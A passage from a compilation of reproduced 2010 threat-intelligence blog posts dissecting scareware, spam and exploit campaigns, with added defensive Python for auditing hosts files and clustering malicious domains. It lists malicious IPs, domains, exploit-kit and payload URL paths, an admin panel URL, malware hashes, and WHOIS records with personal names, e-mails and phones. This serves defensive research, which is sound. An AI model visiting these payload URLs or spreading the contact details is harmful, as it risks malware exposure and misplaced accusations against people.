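    return ip is not None and (ip.is_loopback or ip.is_unspecified)


def audit_hosts(text, fan_in=3):
    """Return (hijacks, fan_in_ips).

    hijacks: one Finding per watched hostname mapped to a non-local address.
    fan_in_ips: {ip: [hostnames]} for non-local IPs that absorb at least
    `fan_in` distinct hostnames, watched or not.
    """
    hijacks, per_ip = [], defaultdict(set)
    for n, ip, hosts in parse_hosts(text):
        if _is_local(ip):
            continue
        for host in hosts:
            name = host.lower()
            # The post's HijackThis output shows entries carrying a URL
            # scheme; a real hostname never does, so strip it and flag it.
            malformed = "://" in name
            if malformed:
                name = name.split("://", 1)[1].rstrip("/")
            if ip is not None:
                per_ip[str(ip)].add(name)
            if is_watched(name):
                hijacks.append(Finding(n, str(ip), name, malformed))
    sinks = {ip: sorted(h) for ip, h in per_ip.items() if len(h) >= fan_in}
    return hijacks, sinks


# Constructed sample modelled on the O1 entries quoted in the post: the two
# public IPs are the ones the post names, every hostname choice is ours.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.example   # legitimate internal override
0.0.0.0         ads.tracker.example     # blocklist-style entry
74.125.45.100   securepay-portal.example
74.125.45.100   safebrowsing-cache.google.com
74.125.45.100   urs.microsoft.com
74.82.216.3     google.com
74.82.216.3     http://www.google.com
74.82.216.3     google.co.uk
74.82.216.3     search.yahoo.com
74.82.216.3     de.search.yahoo.com
74.82.216.3     www.bing.com
"""
```

Running `audit_hosts(SAMPLE_HOSTS)` on the sample yields eight watched-hostname findings (one of them the malformed scheme-carrying entry) and two sink IPs; a blocklist that maps the same names to 127.0.0.1 or 0.0.0.0 produces nothing.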

Related research on blackhat SEO campaigns:

[11] The ultimate guide to scareware protection

[12] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang

[13] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[14] A Peek Inside the Managed Blackhat SEO Ecosystem

[15] Dissecting a Swine Flu Black SEO Campaign

[16] Massive Blackhat SEO Campaign Serving Scareware

[17] From Ukrainian Blackhat SEO Gang With Love

[18] From Ukrainian Blackhat SEO Gang With Love - Part Two

[19] From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Blackhat SEO Farms

[20] From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts

[21] Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot

This post has been reproduced from [22]Dancho Danchev's blog. Follow him [23]on Twitter.
Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign (2010-06-08 21:49)

Researchers from eSoft are reporting on [1]135,000 Fake YouTube pages currently serving scareware, while also using multiple monetization/traffic optimization tactics for the hijacked traffic.

Based on the campaign's structure, it's pretty clear that the [2]template-ization of malware serving sites ([3]Part Two) is not dead. Let's dissect the campaign, its structure, the monetization/traffic optimization tactics used, list all the domains+URLs involved, and establish multiple connections (in the face of AS6851, BKCNET "SIA" IZZI) to recent malware campaigns - cybercriminals are often customers of the same cybercrime-friendly provider.
The campaign is relying on a typical mix of compromised and purely malicious sites, but is using not just an identical template but an identical campaign structure, which remains pretty static for the time being. Upon visiting one of the sites and meeting the referrer requirement - Google works fine - the hardcoded preload.php loads, which always points to the same IP, using a randomly generated code which changes over time - 91.188.60.126/?q=jzhaf - AS6851, BKCNET "SIA" IZZI:

inetnum: 91.188.60.0 - 91.188.60.255
netname: ATECH-SAGADE
descr: Sagade Ltd.
descr: Latvia, Rezekne, Darzu 21
descr: +371 20034981
remarks: abuse-mailbox: piotrek89@gmail.com
country: LV
admin-c: TMCD111-RIPE
tech-c: TMCD111-RIPE
status: ASSIGNED PA
mnt-by: AS6851-MNT
changed: taner@bkc.lv 20100423
source: RIPE

role: TMCD Admin Contacts
address: Ieriku 67a, Riga, LV-1084
org: ORG-TMDA1-RIPE
e-mail: bkc@bkc.lv
admin-c: AS1606-RIPE
admin-c: TP422-RIPE
tech-c: RF2443-RIPE
tech-c: IR106-RIPE
nic-hdl: TMCD111-RIPE
changed: taner@bkc.lv 20081023
source: RIPE


Moreover, the second traffic optimization strategy takes place by loading two different subdomains from byethost4.com, where another redirection takes place, this time loading the bogus mybookface.net - 209.51.195.115 - Email: hostorgadmin@googlemail.com

Sample campaign structure:

- compromised_site.com
- compromised_site.com/preload.php
- 91.188.60.126/?q=jzhaf
- popal.byethost4.com/mlk.php?sub=2&r=google.com
- trash.byethost14.com/tick.php?sub=1&r=google.com
- cnbutterfly.com/contact.php?uid=2034 - 74.81.93.227
- simulshop.com/contact.php?uid=2034 - 88.198.177.74
- www3.smartbestav10.co.cc - 74.118.194.78
Domains involved in the campaign:

• [4] Complete list of the actual URLs involved in the campaign; [5]Pastebin

Detection for the scareware, and the manual install binary:

- install.exe - [6]Trojan.FakeAlert.CCS; FraudTool.Win32.SecurityTool (v) - Result: 16/40 (40 %) - MD5: 3562be54671a1326eeef8bcfc85bd2a0

- packupdate107_2034.exe - [7]Packed.Win32.Krap.an; TrojWare.Win32.Trojan.Fakealert.4193280 - Result: 10/41 (24.4 %) - MD5: 991bba541e1872191ec5eb88c7de1f30

Upon execution the sample phones back to:

update2.protect-helper.com - 95.169.186.25 - Email: gkook@checkjemail.nl

update1.free-guard.com - 95.169.186.25 - Email: gkook@checkjemail.nl

- install.48728.exe - [8]Trojan.FakeAV; TrojanDownloader:Win32/Renos.KX - Result: 26/41 (63.42 %) - MD5: 15281c3f3fac1ccdaf43e2b26d32a887

Upon execution the sample phones back to:

Based on cross-checking across different data sets, 91.188.60.126 - AS6851, BKCNET "SIA" IZZI is also known to have been used by at least 4 other members of the affiliate network. Naturally, their "signature" can be seen across multiple ASs as well.

The same scareware affiliate program is seen on the following IPs, using a different set of affiliate partners:

194.8.250.154/news.php?land=20&affid=12400 - AS43134, Donstroy Ltd; Emails: donstroitel@mail.com; godaccs@gmail.com
194.8.250.155/news.php?land=20&affid=12400
194.8.250.157/news.php?land=20&affid=42500
194.8.250.158/news.php?land=20&affid=42500

91.188.60.118/news.php?land=20&affid=50900 - AS6851, Sagade Ltd.; Emails: piotrek89@gmail.com
91.188.60.124/news.php?land=20&affid=12800
91.188.60.126/news.php?land=20&affid=15600
91.188.60.146/news.php?land=20&affid=20102
91.188.60.147/news.php?land=20&affid=20102

91.213.157.165/news.php?land=20&affid=50900 - AS13618, PE "Sattelecom"; Emails: tt@sattelecom.biz

77.78.239.71/news.php?land=20&affid=12400 - AS42560, MAXIMUS-NET-SERVICES; Emails: godaccs@gmail.com; bosko@globalnet.ba
77.78.239.76/news.php?land=20&affid=12400
77.78.239.77/news.php?land=20&affid=15603
As for AS6851, BKCNET "SIA" IZZI, the same AS is also seen in the following campaigns; find below an excerpt from a previous post, emphasizing the Koobface gang connection, in the sense that they're both customers of the same cybercrime-friendly ISP.

• [9]Spamvertised iTunes Gift Certificates and CV Themed Malware Campaigns

• [10]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware

• [11]Dissecting the Mass DreamHost Sites Compromise

What's so special about [12]AS6851, BKCNET "SIA" IZZI anyway? It's the Koobface gang connection in the face of urodinam.net, which is also hosted within AS6851, currently responding to 91.188.59.10. More details on urodinam.net:

• [13]Koobface Botnet's Scareware Business Model

• [14]Koobface Botnet's Scareware Business Model - Part Two

Moreover, on the exact same IP where the Koobface gang's urodinam.net is parked, we also have the currently active Izabslwvn538n4i5tcjl.com - Email: michaeltycoon@gmail.com, serving client side exploits using the Yes Malware Exploitation kit - 91.188.59.10/temp/cache/PDF.php; admin panel at: Izabslwvn538n4i5tcjl.com/temp/admin/index.php
For the time being, the following domains and IPs are all active within AS6851, BKCNET "SIA" IZZI:

Name servers of notice:

ns1.iill0oil0.com - 91.188.59.70
ns2.iill0oil0.com - 91.188.59.71

Domains using their services:
Take down actions are in place; meanwhile, consider going through the "[15]Ultimate Guide to Scareware Protection".

This post has been reproduced from [16]Dancho Danchev's blog. Follow him [17]on Twitter.
Facebook Photo Album Themed Malware Campaign, Mass SQL Injection Attacks Courtesy of AS42560 (2010-06-15 16:05)

A Photo Album themed campaign spamvertised through Facebook personal messages, with the domain's IP responding to ZeuS C&Cs, combined with an indirect connection between this campaign and the "[1]100,000+ Scareware Serving Fake YouTube Pages Campaign", followed by a domain portfolio used in a currently active mass SQL injection attack serving CVE-2007-5659 exploits, parked within the same AS as the Facebook campaign itself.

What else is missing? The details, of course.

DM spamvertised URL: online-photo-albums.org - 77.78.239.4, AS42560, BA-GLOBALNET-AS - Email: protect@privacy.com.ua

Detection rate: album.exe - [2]Win32.DownloaderReno; Backdoor.Win32.Kbot.anj - Result: 12/41 (29.27 %)
MD5: d24aa2c364d4b86f75a09362c952a838
SHA1: 3973c547b64d166ae807eec494c373efd53ac04c

Creates 1.exe, 2.exe and the self-destructing 3.exe. Detection rates:

- 1.exe - [3]Result: 0/41 (0.00 %)
MD5: fbd0a495d3409123d0e90a9a734cbbc1
SHA1: ce527267f50b433c622e5da0db5515a4d2e4ae9c

- 2.exe - [4]Win32.DownloaderReno; Sus/UnkPacker - Result: 10/41 (24.39 %)
MD5: 7a4feaf8d9acf982d0cbeb437e4f7c3d
SHA1: 39b280d0d2ec505a94415f7a9468a547fee51c66

with 3.exe phoning back to the following domain, also responding to the original campaign's IP 77.78.239.4:

spmfb3309.com/ab/setup.php?act=filters&id=BWKJDONWLt3pn2Vh6YlhhBe3&ver=2

inetnum: 77.78.239.0 - 77.78.240.255
netname: MAXIMUS-NET-SERVICES
remarks: ### in case of abuse please contact: godaccs@gmail.com ###
descr: Maximus hosting services
country: MD
admin-c: JB1004
tech-c: JB1004
status: ASSIGNED PA
mnt-by: BA-GLOBALNET
changed: bosko@globalnet.ba 20100528
source: RIPE

person: Jerkovic Bosko
address: Josipa Vancasa 10
address: 71000 Sarajevo
address: Bosnia and Herzegovina
phone: +387 33 221093
e-mail: bosko@globalnet.ba
nic-hdl: JB1004
mnt-by: BA-GLOBALNET
changed: bosko@globalnet.ba 20070309
source: RIPE

Surprise, surprise, where do we know that godaccs@gmail.com abuse email from? From the previously profiled "[5]Dissecting the 100,000+ Scareware Serving Fake YouTube Pages Campaign". In particular:

- AS43134, Donstroy Ltd; Emails: donstroitel@mail.com; godaccs@gmail.com

- AS42560, MAXIMUS-NET-SERVICES; Emails: godaccs@gmail.com

Responding to 77.78.239.4 (online-photo-albums.org) are also the following domains:

hyporesist.com - Email: Kyle.MoodyAI@yahoo.com - Used to register ever52592g.com; miror-counter.org; mnfrekjivr.com
newsbosnia.org - Email: qggrvpvwiw@whoisservices.cn - [6]ZeuS crimeware C&C
online-photo-albums.org - Email: protect@privacy.com.ua
search-static.org - Email: Kyle.MoodyAI@yahoo.com
spmfb2299.com - Email: iaycxpqguk@whoisservices.cn
spmfb3309.com - Email: qhyfafvqyh@whoisservices.cn
vostokgear.org - Email: afgjvubuym@whoisservices.cn

Where's the mass SQL injection attack connection? Within 
AS42560, responding to 77.78.239.56 are also the 

following domains, part of the campaign: 
google-server09.info - Email: kit00066@gmail.com
google-server10.info - Email: kit00066@gmail.com
google-server11.info - Email: kit00066@gmail.com
google-server12.info - Email: kit00066@gmail.com
google-server14.info - Email: kit00066@gmail.com
google-server29.info - Email: kit00066@gmail.com
google-server31.info - Email: kit00066@gmail.com
jhuiuhxfgxhlfkjhjth.info - Email: kit00066@gmail.com
jhuiuhxfgxhtfkjhjth.info - Email: kit00066@gmail.com
jhuiuhxfgxhlfkjhjth.info - Email: kit00066@gmail.com
top-teen-porn.info - Email: kit00066@gmail.com

Sample mass injection URLs:

google-server09.info /urchin.js
google-server10.info /urchin.js
google-server11.info /urchin.js
google-server12.info /urchin.js
google-server14.info /urchin.js
google-server29.info /urchin.js
google-server31.info /urchin.js
jhuiuhxfgxhlfkjhjth.info /urchin.js
jhuiuhxfgxhtfkjhjth.info /urchin.js
jhuiuhxfgxhlfkjhjth.info /urchin.js

Detection rate:

- urchin.js - [7]Trojan.JS.Redirector.ca (v); JS:Downloader-LP - Result: 4/41 (9.76 %)

MD5: 3f2bc50c30ed8e7997b3de3d528d0ed5

SHA1: 66d6edef711516201f20fce676175ad16777e162


Sample exploitation structure from the mass SQL injection campaign:

- google-server31.info /urchin.js

- Scanner-Album.com /?affid=382&subid=landing - 91.212.127.19, AS49087, Telos-Solutions-AS - Email: systemman_mk@gmail.com

- websitecoolgo.com /cgi-bin/158 - 91.188.59.220 - AS6851, BKCNET "SIA" IZZI - Email: marcomarcian@hotmailbox.com

- websitecoolgo.com /cgi-bin/random content leading to CVE-2007-5659
Parked on 91.212.127.19 (Scanner-Album.com), AS49087, Telos-Solutions-AS:

automaticsecurityscan.com - Email: robertwatkins@hotmailbox.com
bigsecurityscan.com - Email: robertwatkins@hotmailbox.com
blacksecurityscan.com - Email: robertwatkins@hotmailbox.com
edscorpor.com - Email: leonschmura@hotmailbox.com
edsctrum.com - Email: admin@edsfiles.com
edsfiles.com - Email: leonschmura@hotmailbox.com
edsfilles.com - Email: leonschmura@hotmailbox.com
edsletter.com - Email: leonschmura@hotmailbox.com
edslgored.com - Email: leonschmura@hotmailbox.com
edsnewter.com - Email: leonschmura@hotmailbox.com
edsogos.com - Email: leonschmura@hotmailbox.com
edsspectr.com - Email: leonschmura@hotmailbox.com
edstoox.com - Email: leonschmura@hotmailbox.com
findsecurityscan.com - Email: robertwatkins@hotmailbox.com
memory-scanner.com - Email: systemman_mk@gmail.com
onefindup.org - Email: JamesHying@xhotmail.net
scanner-album.com - Email: systemman_mk@gmail.com
scanner-definition.com - Email: rutkowski_m3@gmail.com
scanner-hardware.com - Email: systemman_mk@gmail.com
scanner-master.com - Email: systemman_mk@gmail.com
scanner-models.com - Email: systemman_mk@gmail.com
scanner-profile.com - Email: systemman_mk@gmail.com
scanner-programming.com - Email: systemman_mk@gmail.com
scanner-supplies.com - Email: rutkowski_m3@gmail.com
scanner-tips.com - Email: systemman_mk@gmail.com
searchdubles.org - Email: MerleMeisin@xhotmail.net
searchmartiup.org - Email: MerleMeisin@xhotmail.net
searchprasup.org - Email: MerleMeisin@xhotmail.net
searchprodinc.org - Email: MerleMeisin@xhotmail.net
searchtanup.org - Email: MerleMeisin@xhotmail.net
Responding to 91.188.59.220 and 91.188.59.221 (websitecoolgo.com) within AS6851, BKCNET "SIA" IZZI are also the following domains, participating in different campaigns:

internetgotours.com - Email: marcomarcian@hotmailbox.com
mediaboomgo.com - Email: paulalameda@hotmailbox.com
mediagotech.com - Email: marcomarcian@hotmailbox.com
mediaracinggo.com - Email: paulalameda@hotmailbox.com
netgozero.com - Email: marcomarcian@hotmailbox.com
nethealthcarego.com - Email: marcomarcian@hotmailbox.com
networkget.com - Email: marcomarcian@hotmailbox.com
networksportsgo.com - Email: marcomarcian@hotmailbox.com
patricknetgo.com - Email: paulalameda@hotmailbox.com
webaliveget.com - Email: paulalameda@hotmailbox.com
webcoolgo.com - Email: paulalameda@hotmailbox.com
webgettraffic.com - Email: paulalameda@hotmailbox.com
webgetwisdom.com - Email: marcomarcian@hotmailbox.com
webgetwise.com - Email: marcomarcian@hotmailbox.com
webgoengine.com - Email: paulalameda@hotmailbox.com
webgosolutions.com - Email: paulalameda@hotmailbox.com
webmagicgo.com - Email: paulalameda@hotmailbox.com
websitecoolgo.com - Email: marcomarcian@hotmailbox.com
websiteget.com - Email: marcomarcian@hotmailbox.com



The rise of [8]custom abuse emails, conveniently offered to cybercrime-friendly dedicated customers?

It's worth pointing out that godaccs@gmail.com, a.k.a. CompUfe, Ltd, is conveniently responsible for AS42560, BA-GLOBALNET-AS; AS43134, Donstroy Ltd; and AS42560, MAXIMUS-NET-SERVICES, followed by piotrek89@gmail.com, responsible for [9]AS6851, BKCNET "SIA" IZZI (used by the Koobface gang, and also seen in the following campaigns: [10]Spamvertised iTunes Gift Certificates and CV Themed Malware Campaigns; [11]GoDaddy's Mass WordPress Blogs Compromise Serving Scareware).

This post has been reproduced from [12]Dancho Danchev's blog. Follow him [13]on Twitter.
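The pivoting done by hand throughout this post, linking domains through a shared registrant e-mail, a shared hosting IP or, more weakly, a shared AS, is mechanical enough to automate. The following is an added example, not code from the post: it takes a handful of the (domain, e-mail, IP, AS) tuples listed above, plus one assumed unrelated domain sitting behind the same WHOIS privacy address, and groups them by shared pivot with a union-find. The privacy-service address list and the extra unrelated-example.org record are assumptions; every other value is copied from the post.

```python
from collections import defaultdict

# Constructed sample copied from the post's infrastructure notes:
# (domain, registrant e-mail, hosting IP, AS).  The last record is an
# assumed, unrelated domain behind the same WHOIS privacy address; it is
# there to show why privacy addresses must not be used as a pivot.
RECORDS = [
    ("online-photo-albums.org", "protect@privacy.com.ua",       "77.78.239.4",   "AS42560"),
    ("spmfb3309.com",           "qhyfafvqyh@whoisservices.cn",  "77.78.239.4",   "AS42560"),
    ("newsbosnia.org",          "qggrvpvwiw@whoisservices.cn",  "77.78.239.4",   "AS42560"),
    ("hyporesist.com",          "Kyle.MoodyAI@yahoo.com",       "77.78.239.4",   "AS42560"),
    ("search-static.org",       "Kyle.MoodyAI@yahoo.com",       "77.78.239.4",   "AS42560"),
    ("google-server09.info",    "kit00066@gmail.com",           "77.78.239.56",  "AS42560"),
    ("google-server31.info",    "kit00066@gmail.com",           "77.78.239.56",  "AS42560"),
    ("scanner-album.com",       "systemman_mk@gmail.com",       "91.212.127.19", "AS49087"),
    ("memory-scanner.com",      "systemman_mk@gmail.com",       "91.212.127.19", "AS49087"),
    ("websitecoolgo.com",       "marcomarcian@hotmailbox.com",  "91.188.59.220", "AS6851"),
    ("mediagotech.com",         "marcomarcian@hotmailbox.com",  "91.188.59.220", "AS6851"),
    ("unrelated-example.org",   "protect@privacy.com.ua",       "198.51.100.7",  "AS64496"),  # assumed
]

PIVOT_INDEX = {"email": 1, "ip": 2, "asn": 3}

# Assumed list of WHOIS privacy-service addresses: a shared entry here says
# nothing about common ownership, so it is skipped when pivoting on e-mail.
PRIVACY_EMAILS = {"protect@privacy.com.ua"}


def _find(parent, x):
    while parent[x] != x:
        parent[x] = parent[parent[x]]
        x = parent[x]
    return x


def _union(parent, a, b):
    parent[_find(parent, a)] = _find(parent, b)


def cluster(records, pivots=("email", "ip"), privacy_emails=PRIVACY_EMAILS):
    """Group domains that share any pivot value (transitively).

    Returns a sorted list of sorted domain tuples, one per cluster.  Adding
    "asn" to pivots reproduces the post's weaker "same AS" link, which merges
    far more than it should on a large hoster and is best used only as a hint.
    """
    parent = list(range(len(records)))
    by_value = defaultdict(list)
    for i, rec in enumerate(records):
        for pivot in pivots:
            value = rec[PIVOT_INDEX[pivot]].lower()
            if pivot == "email" and value in privacy_emails:
                continue
            by_value[(pivot, value)].append(i)
    for members in by_value.values():
        for other in members[1:]:
            _union(parent, members[0], other)
    groups = defaultdict(list)
    for i, rec in enumerate(records):
        groups[_find(parent, i)].append(rec[0])
    return sorted(tuple(sorted(g)) for g in groups.values())


def evidence(records, domains, pivots=("email", "ip"), privacy_emails=PRIVACY_EMAILS):
    """For one cluster, list each pivot value shared by at least two of its domains."""
    wanted = set(domains)
    seen = defaultdict(set)
    for rec in records:
        if rec[0] not in wanted:
            continue
        for pivot in pivots:
            value = rec[PIVOT_INDEX[pivot]].lower()
            if pivot == "email" and value in privacy_emails:
                continue
            seen[(pivot, value)].add(rec[0])
    return {key: sorted(doms) for key, doms in seen.items() if len(doms) > 1}


if __name__ == "__main__":
    for group in cluster(RECORDS):
        print(len(group), "domain(s):", ", ".join(group))
        for (pivot, value), doms in evidence(RECORDS, group).items():
            print("   shared", pivot, value, "->", ", ".join(doms))
```

With e-mail and IP as pivots the sample falls into the four groups the post describes plus the lone privacy-protected domain; dropping the privacy-address exclusion wrongly folds that domain into the 77.78.239.4 group, and adding "asn" merges the 77.78.239.4 and 77.78.239.56 groups through AS42560, which is the post's own (weaker) argument.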

1. http://ddanchev.blogspot.com/2010/06/dissecting-100000-scareware-serving.html

2. http://www.virustotal.com/analisis/2ace318127ee5b49b44df31561928a75022f258a53e521ab4c4ab12791ec66b3-1276604208

3. http://www.virustotal.com/analisis/bfe5a1b7a6aaf0a931ca0765f149cd1dc26f3f85ac6163dbde07578602febb70-1276605051

4. http://www.virustotal.com/analisis/4e6bc0e52d3ef88e0db7f10d0cb6219caea7b313b7fe50282d43dc6d6cd61d70-1276605058

5. http://ddanchev.blogspot.com/2010/06/dissecting-100000-scareware-serving.html

6. https://zeustracker.abuse.ch/monitor.php?ipaddress=77.78.239.4

7. http://www.virustotal.com/analisis/ff387ec39afa68aabfad3f3fd622ceaca4f58e837f5a6fbd568fcefc5cfdde32-1276607425

8. http://twitter.com/danchodanchev/status/6549021186

9. http://ddanchev.blogspot.com/2010/06/dissecting-100000-scareware-serving.html

10. http://ddanchev.blogspot.com/2010/05/spamvertised-itunes-gift-certificates.html

11. http://ddanchev.blogspot.com/2010/04/godaddys-mass-wordpress-blogs.html

12. http://ddanchev.blogspot.com/

13. http://twitter.com/danchodanchev
Dissecting the Exploits/Scareware Serving Twitter Spam Campaign (2010-06-16 14:32)

[1]Yesterday's exploits-serving campaign spreading across Twitter, using automatically registered accounts "ping-ing" random Twitter users with links to the campaign, is worth profiling due to its state of maliciousness - if the end user is exploitable, exploits are served, ultimately leading to scareware, and if he isn't, the cybercriminals behind it [2]attempt to monetize through the same network used by the [3]Koobface gang on Mac OS X hosts - zmi.com.

Let's dissect the campaign, and once again emphasize just how small the cybercrime ecosystem could be, given that enough historical data is gathered on who's who, who's what, and what's when.

Sample exploitation structure:

- qtoday.info /ttds/doit.php?ckey=12&schema=1&f=wF - 94.228.209.73 (AS47869), 75.125.222.242 (AS21844)

- qtoday.info /ttds/jump.php

- fqsmydkvsffz.com /tre/vena.html/RANDOM - 69.174.242.21 (AS13768); 75.125.222.242 (AS21844)
The scareware installed interacts with AS18866:

69.50.197.241 /up/e1.dat
69.50.197.241 /up/e2.dat
69.50.197.241 /data/upd6.dat
69.50.197.241 /data/upd7.dat
69.50.197.241 /data/upd1.dat
69.50.197.241 /data/upd2.dat

Responding to 69.50.197.241 (AS18866) are:

radarixo.com - Email: moldavimo@safe-mail.net - [4]profiled here

cyberduck.ru - Email: samm_87@email.com - [5]profiled here

livejasment.com - Email: moldavimo@safe-mail.net

linksandz.com - Email: moldavimo@safe-mail.net - [6]profiled here

Detection rates:

- e1.dat - 11 on 17 (65 %) - [7]Trojan.MulDrop1.21645; Win32/Lukicsel.P

MD5 hash: 2566c11a9cd2226b59d226e76bae9f64
SHA1 hash: 6a1fd405f547ed33f7cfe3abad4f423a33c0e281

- e2.dat - 8 on 17 (47 %) - [8]W32/Witkinat.A.gen!Eldorado; Win32/Witkinat.R

MD5 hash: 8daaa96ba059e6b1d5108c314f160175
SHA1 hash: b43d26bb2583d9057cb343c10d5db79c846ed895

- upd1.dat - 11 on 17 (65 %) - [9]TR/Lukicsel.EB; Trojan.Win32.Delf.aaxwA

MD5 hash: 7b2534536cdf168f50d63845b13af8ba
SHA1 hash: 306f5199c3f91cd28c634914a6478bcbc5c4e9c0

- upd2.dat - 11 on 17 (65 %) - [10]TR/Lukicsel.EB; Trojan.Win32.Delf.aaxwA

MD5 hash: 323a1a2429467b3891cc20a26b82f851
SHA1 hash: ae3fe6b442521d95631703ab530213e897e4f8ea

- upd6.dat - 9 on 17 (53 %) - [11]Win32/Lukicsel.P; Trojan-Dropper.Win32.Delf.frm

MD5 hash: d05d89bdadd8a23c2ceb0b016d49550a
SHA1 hash: 366db3c2cd64a57587376b416c42960ad1f28ea3

- upd7.dat - 11 on 17 (65 %) - [12]SHeur3.AAEI; Trojan-Dropper.Win32.Delf.frq

MD5 hash: 1a582b50d82fb57bec036e1962e5da2e
SHA1 hash: 15a9540927f64dec23e625e140dfde7ce3d23df7
The rest of the exploits-serving domains portfolio parked at 69.174.242.21 (AS13768); 75.125.222.242 (AS21844):

danenskgela.com - Email: strohmeiera@yahoo.com
aghoxekaoxk.com - Email: tavsadr5r5@yahoo.com
xfgswsoxoxk.com - Email: tavsadr5r5@yahoo.com
directinmixem.com - Email: strohmeiera@yahoo.com
carsmazda6.in - Email: valeriyku@gmail.com
tfyxffnacsc.com - Email: edb.ri871@gmail.com
sfkemiymeywk.com - Email: admin@overseedomainmanagement.com
aghtdkpaoxk.com - Email: skdhdjfg7s@yahoo.com
aghtdqpaoxk.com - Email: njgf555dfdsa@yahoo.com
dhjftzbdoxk.com - Email: skdhdjfg7s@yahoo.com
dbcyjnudoxk.com - Email: njgf555dfdsa@yahoo.com
mcduimqmoxk.com - Email: fresadmsn7y@yahoo.com
piamlzjpoxk.com - Email: fresadmsn7y@yahoo.com
pfgswlopoxk.com - Email: 7uwy7letel@yahoo.com
qjigaicqoxk.com - Email: 7uwy7letel@yahoo.com
etyet.com - Email: zubakova2@rambler.ru
grantgarant.com - Email: naumann_heikens@yahoo.it
civichonda.in - Email: valeriyku@gmail.com
drotalflow.in - Email: johns2249@googlemail.com
carsinfinity.in - Email: valeriyku@gmail.com
3m70.cn - Email: abuseemaildhcp@gmail.com - [13]money mule registrations, [14]rubbing shoulders with [15]Koobface
mueypflglvlx.com
mbhcnjyyykpr.com
ozkifomzaaqd.com
dqcnefigaefg.com
vtmxgwnpjvib.com
jcfkprwasnaj.com
qgwyinsxlox.com
tsusiwpmzuqz.com
fqsmydkvsffz.com
qcell.info
q-fever.info
vmspl.in
keirun.in
iscobar.in
loncer.in

The complete list of automatically registered bogus Twitter accounts, now suspended:

twitter.com/AbbottMarleneCY
twitter.com/AnsonJamesJs
twitter.com/BandaPaul51
twitter.com/BarkleyTracy52
twitter.com/BoserJames74
twitter.com/BradleySheilaTt
twitter.com/BravoMartinUT
twitter.com/BrownTammyaM
twitter.com/BurlingameStek2
twitter.com/BurtonPauliC
twitter.com/CallowayEileemb
twitter.com/CardiHoLilli8l
twitter.com/CareyJocelynXY
twitter.com/CarpenterJameCl
twitter.com/CarterErnieBj
twitter.com/CarterNanGM
twitter.com/CharltonRoberlY
twitter.com/ClausenJillRC
twitter.com/CochranLindajB
twitter.com/CruzShawnjl
twitter.com/DanielClintonqO
twitter.com/DeanLuigiJB
twitter.com/DeleonChristiDb
twitter.com/DickensRitaS6
twitter.com/EllisonCortezCC
twitter.com/FernandezRobekc
twitter.com/FieldsRichardrx
twitter.com/FryePhilipAx
twitter.com/GarrisonMiltoP9
twitter.com/GilfordSarahqo
twitter.com/GilleyJennifeST
twitter.com/GiordanoHelenxy
twitter.com/GishCharlesCy
twitter.com/GreenDonaldbt
twitter.com/GriffinRay5v
twitter.com/GuzmanEloise5u
twitter.com/HakaiaSteve9e
twitter.com/HammonsLeonarW3
twitter.com/HarmonRaymondMH
twitter.com/HartHeatherS0
twitter.com/HaynesCharlesxo
twitter.com/HendricksonKi6F
twitter.com/JonesAndrewUG
twitter.com/JonesNickolasYx
twitter.com/KendallNormaWS
twitter.com/KroegerAngeliuO
twitter.com/LeeJerroldRk
twitter.com/LevittKevin9e
twitter.com/LewisMaryL8
twitter.com/LimonMargaretgn
twitter.com/MarvelThomasaO
twitter.com/McbeeMelissabu
twitter.com/MillerFranceswe
twitter.com/MitchellDeborvI
twitter.com/MooreJoanut
twitter.com/MorrisMary2n
twitter.com/MorrisonJackOs
twitter.com/NealReginaldbH
twitter.com/NickellGloriad8
twitter.com/PhelpsRichardKL
twitter.com/PittsTommyyy
twitter.com/PlummerAthenawn
twitter.com/PowellMarie94
twitter.com/PradoDonaldG8
twitter.com/RealeBernicegR
twitter.com/ReeseVeronicaFx
twitter.com/RievesShirleyYv
twitter.com/RobinsonAprilri
twitter.com/RobinsonLisa8e
twitter.com/RoblesRicardoWh
twitter.com/RubioLanaj9
twitter.com/SavardAnthonyoU
twitter.com/SayersWendellVc
twitter.com/SchmidtLynnk7
twitter.com/ShankleKathleor
twitter.com/SieversDarleelD
twitter.com/SmithGeorgieMq
twitter.com/SteinAshleyuQ
twitter.com/StoughKelseyqt
twitter.com/TrejoLisaOO
twitter.com/TullosHowardCo
twitter.com/WeberSteven6r
twitter.com/WhiteMichellevj
twitter.com/WilkinsonPaulTd
twitter.com/WillettErnestCR
twitter.com/WilliamsMichaBl
twitter.com/WoodsThelmayO
twitter.com/WynnRichard4m
twitter.com/YoungMelanieSZ
twitter.com/CooleyFrancescC
twitter.com/SchneiderKim6h
twitter.com/DobsonElsiequ
twitter.com/PeelLouise9q
twitter.com/WhiteYolandaOP
twitter.com/FrostAngeloY2
twitter.com/MillerMaryxl

PDF exploits, binaries streaming from the domain portfolio at 69.174.242.21 (AS13768); 75.125.222.242 (AS21844):

MD5: 5d42bb346601ba456b52edd3c3e59d1b
MD5: ba19c971edefffb22d44e43a91a7d9a9
MD5: e7a354f58bfe21c815ddb8faf00bd08c
MD5: 4a13b96dd056c0075c553588f0211c44
MD5: 29e71e291a31ea8f1cddbf7d96f7de86
MD5: 3bb6bdaf8d4e2822da86ef9a614a04ea
MD5: f41470c7b9ad2260625d2a62b6db158f
MD5: 3987c92c20c3f17b5892f84069d816d1
MD5: 87a95ec041b2432727336f0cdeee123a
MD5: 5d497e1841f5627a1b77dbc336da1594
MD5: 5ba1aafcef9ea7516f1ae7082424e83d
MD5: 5268f85902c7064b393bbbb3dbc094f9

SHA1: 79526ca9579420cb46c15fe94b282868c1e7fbbd
SHA1: f70f6a9aa0aa092511894f7c89defc64637504a1
SHA1: 5175b38dfca3dc7dd6ad56bed34a543f14702bea
SHA1: 2f2c88e0b950cd91ad1e49be73e885b07f401f68
SHA1: b92d1268d06c8ba427beefc1ee7b064873694a47
SHA1: 5ba7ba0dc08a3d0cd3feb363394d295637a64e10
SHA1: 7ecb2679cd23e6c6973c57092b1cae46f60db97e
SHA1: 66ed858043d6d022823b16956f416e3080e618a1
SHA1: 0fdd1de26d5902d4a21b053a212a21c2760d8aee
